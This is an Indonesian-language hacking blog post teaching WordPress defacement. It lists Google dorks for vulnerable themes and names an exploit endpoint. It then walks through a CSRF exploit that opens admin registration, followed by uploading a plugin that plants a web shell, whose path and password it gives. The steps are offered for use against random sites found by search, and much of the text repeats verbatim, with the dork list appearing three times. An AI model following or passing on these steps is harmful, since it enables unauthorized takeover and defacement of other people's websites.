deface metode ADD ADMIN WORDPRESS 2018
hello bro,,,,udah lama gk share di blog ini,malam ini ane mau share cara deface add admin wordpress.
gak usah banyak cingcong,langsung aja siapin bahan nya+++++++++++++++++++++++++++++++++++++++++++++++++++
bahan nya :
1) dork nya :
- inurl:/wp-content/themes/appius/
- inurl:/wp-content/themes/Consultant/
- inurl:/wp-content/themes/appius1/
- inurl:/wp-content/themes/archin/
- inurl:/wp-content/themes/averin/
- inurl:/wp-content/themes/dagda/
- inurl:/wp-content/themes/echea/
- inurl:/wp-content/themes/felici/
- inurl:/wp-content/themes/GantiDengantema/
- inurl:/wp-content/themes/kmp/
- inurl:/wp-content/themes/kmp2/
- inurl:/wp-content/themes/themanya/
- inurl:/wp-content/themes/liberal/
- inurl:/wp-content/themes/liberal-media-bias/
- inurl:/wp-content/themes/linguini/
- inurl:/wp-content/themes/livewire/
- inurl:/wp-content/themes/majestics/
- inurl:/wp-content/themes/mathis/
- inurl:/wp-content/themes/mazine/
- inurl:/wp-content/themes/Orchestra/
- inurl:/wp-content/themes/shopsum/
- inurl:/wp-content/themes/shotzz/
- dan masih banyak lagi tema Vuln lainnya Baca Selengkapnya
trus kalian download plugins nya buat upload shell nya bisa download DI SINI
3) exploit nya : /hades_framework/option_panel/ajax.php
contoh nya :site.com/wp-content/themes/namatemanya/hades_framework/option_panel/ajax.php
4) exploit csrf nya download DI MARI OM
+++++++++++++++++++++++++++++++++++++++++++++++++++
langsung praktek aja
pertama ente cari di google dengan dork di atas
trus pilih salah satu web nya
kalo kosong tanda nya vuln om siap di tusbool
OK kita buka exploit csrf nya dengan notepad atau apalah free
itu yg ane blok ubah sama web kalian trus ubah juga username sama email nya lalu
save dan buka di browser kalian
nah trus klik submit
nah tar jadi nya kaya gini
nah tu ada tulisan SUCCESS
trus kalian masuk ke register nya di site.com/wp-login.php?action=register atau site.com/(dirnya)/wp-login.php?action=register
kaya di bawah ini
nah masukin username kalian dan email nya dan buka email kalian tunggu verifikasi nya trus login dah. tinggal upload plugins nya dan buat panggil shell nya di site.com/wp-content/plugins/dark-mode/opok.php pass nya : kronkz
tingal exsekusi aja bro,,OK sekian dari ane,klo ada kata kata susah di pahami bisa tanya langsung di ig atau di email saya.
IG : @mrkronkz
email : woyname@gmail.com
sekian dan terima kasih
nah tu ada tulisan SUCCESS
trus kalian masuk ke register nya di site.com/wp-login.php?action=register atau site.com/(dirnya)/wp-login.php?action=register
kaya di bawah ini
nah masukin username kalian dan email nya dan buka email kalian tunggu verifikasi nya trus login dah. tinggal upload plugins nya dan buat panggil shell nya di site.com/wp-content/plugins/dark-mode/opok.php pass nya : kronkz
tingal exsekusi aja bro,,OK sekian dari ane,klo ada kata kata susah di pahami bisa tanya langsung di ig atau di email saya.
IG : @mrkronkz
email : woyname@gmail.com
sekian dan terima kasih
inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/GantiDengantema/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/themanya/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
•dan masih banyak lagi tema Vuln lainnya Baca Selengkapnya :
http://www.mas-tah.com/2017/08/deface-dengan-teknik-add-admin-wp.html
Dork:
inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/GantiDengantema/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/themanya/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
•dan masih banyak lagi tema Vuln lainnya Baca Selengkapnya :
http://www.mas-tah.com/2017/08/deface-dengan-teknik-add-admin-wp.html
Dork:
inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/GantiDengantema/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/themanya/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
•dan masih banyak lagi tema Vuln lainnya Baca Selengkapnya :
http://www.mas-tah.com/2017/08/deface-dengan-teknik-add-admin-wp.html
Komentar
Posting Komentar